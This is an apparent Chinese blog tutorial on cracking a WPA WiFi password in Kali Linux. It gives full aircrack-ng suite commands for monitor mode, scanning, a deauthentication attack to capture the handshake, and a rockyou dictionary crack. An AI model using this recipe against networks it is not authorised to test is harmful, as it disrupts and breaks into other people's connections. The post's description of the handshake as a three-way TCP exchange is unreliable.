栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

kali WiFi密码破解分享

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

kali WiFi密码破解分享

安装kali:

这里就不介绍如何安装kali了,跟着网上教程安装就行
这里推荐推荐:

https://blog.csdn.net/weixin_41247970/article/details/104118700

使用工具:

这是我使用的网卡:RT3070

开始主题:

切换到root模式:

su root

看见root后面的骷髅头没(请合理使用技术)
这里说一下输入密码是看不见的(就是不显示密码)

查看无线网卡:

airmon-ng

可以看到显示wlan0 ,这就是我的网卡

开启网卡的监听模式

airmon-ng start wlan0

其他网卡处于监听状态,需要先将其关闭

airmon-ng check kill

再次查看网卡:

airmon-ng

会发现waln0变成wlan0mon

扫描附近的wifi信号:

airodump-ng wlan0mon

BSSID为wifi的MAC地址,PWR为信号强弱程度,数值越小信号越强;#DATA为数据量,越大使用的人就越多,CH为信道频率(频道),ESSID为wifi的名称,中文可能会有乱码

我将破解名称为shujin(这个是我自己的WiFi)的这个wifi,也就是第一个wifi
Ctrl+c(停止)

抓取wifi数据包并保存:

airodump-ng -c 1 --bssid 36:13:E8:74:F8:83 -w ~/wifi/test wlan0mon

攻击获取WPA hankshake:

aireplay-ng -<攻击模式,这里使用持续攻击(0)> [攻击次数,0为无限攻击] -a  -c <被攻击设备的MAC地址> 
aireplay-ng -0 10 -a 36:13:E8:74:F8:83 -c 10:32:7E:01:67:F8 wlan0mon

攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包,我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码,数据包里面的密码是哈希加密的,哈希加密只能正向

查看被攻击的用户是否重新连接wifi:

airodump-ng -c 1 --bssid 36:13:E8:74:F8:83 -w ~/wifi/test wlan0mon

会出现**WPA handshake:**表示成功

使用字典破解:

kali有自带的字典需要解压(rockyou.txt.gz)

输入命令:

注意查看上面保存的地址

aircrack-ng -w /usr/share/wordlists/rockyou.txt ~/wifi/test-06.cap

答案

结束:

这个不是万能的,你必须有强大的字典,强密码就很难破解(有一些还破解不了,得使用其他技术)

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/734544.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号